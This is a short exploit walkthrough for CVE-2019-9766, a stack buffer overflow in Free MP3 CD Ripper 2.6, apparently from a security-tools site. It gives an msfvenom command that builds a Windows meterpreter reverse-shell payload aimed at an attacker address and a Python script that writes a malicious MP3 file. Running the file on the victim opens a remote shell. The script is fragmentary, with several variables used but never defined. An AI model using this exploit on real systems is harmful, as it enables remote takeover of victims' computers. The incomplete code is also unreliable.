CVE-2019-9766

Exploiting the buffer overflow vulnerability in Free MP3 CD Ripper version 2.6, by constructing a specially crafted MP3 file, when the attacker uses the player to play the audio file, the audio file bait exploits the buffer overflow vulnerability to execute arbitrary code.

Reproduction

Attack machine: kali201903 (192.168.198.142)

Victim machine: Windows 10 21H1 (192.168.198.137)

Install Free MP3 CD Ripper 2.6 on the victim machine, and use MSF on the Kali machine to generate reverse shellcode:

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.198.142 lport=888 -f c --smallest

Replace the payload in the following code with the payload generated above

root@kitploit:~
# Stack-based buffer overflow in Free MP3 CD Ripper 2.6

pad = "B" * (316 - len(nops) - len(buf))
payload = buffer + NSEH + SEH + nops + buf + pad
try:
    f = open("Test_Free_MP3.mp3","w")
    print "[+]Creating %s bytes mp3 Files..."%len(payload)
    f.write(payload)
    f.close()
    print "[+]mp3 File created successfully!"
except:
    print "File cannot be created!"

Run the script to generate a .mp3 file:

Move this mp3 file to the victim machine, then start the MSF console on the Kali machine and set the parameters as follows:

image-20220914095709754

After setting up, start listening. On the victim machine, open the mp3 file with the software, and the reverse shell is successfully obtained:

Note: Only Kali 2019 version works; Kali 2020 and later versions fail (related to the MSF version). Additionally, it must be verified on Windows 10; verification on Windows 7 fails (both 64-bit).
